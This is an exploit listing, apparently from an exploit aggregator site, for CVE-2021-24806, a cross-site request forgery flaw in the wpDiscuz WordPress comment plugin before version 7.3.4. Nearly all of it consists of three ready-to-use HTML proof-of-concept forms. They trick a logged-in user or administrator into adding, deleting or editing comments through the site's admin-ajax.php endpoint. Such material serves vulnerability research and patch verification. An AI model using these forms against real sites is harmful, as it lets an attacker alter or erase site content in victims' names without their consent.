Exploit for wpDiscuz < 7.3.4 - Arbitrary Comment Addition/Edition/Deletion via CSRF CVE-2021-24806

Name: Exploit for wpDiscuz < 7.3.4 - Arbitrary Comment Addition/Edition/Deletion via CSRF CVE-2021-24806
Rating: 5 (346 reviews)

2021-10-11 | CVSS 4.3

## https://sploitus.com/exploit?id=WPEX-ID:2746101E-E993-42B9-BD6F-DFD5544FA3FE
To make the logged in user add a comment
<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="wpdAddComment" />
      <input type="hidden" name="wc_comment" value="Comment added via CSRF" />
      <input type="hidden" name="submit" value="Post Comment" />
      <input type="hidden" name="wpdiscuz_unique_id" value="dummy" />
      <input type="hidden" name="postId" value="811" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


To delete a comment (CSRF against an admin)
<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="wpdDeleteComment" />
      <input type="hidden" name="id" value="27" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


To edit a comment (CSRF against user who made the comment or an admin to modify any comment)
<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="wpdSaveEditedComment" />
      <input type="hidden" name="commentId" value="6" />
      <input type="hidden" name="wc_comment" value="Attacker CSRF" />
      <input type="hidden" name="postId" value="811" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>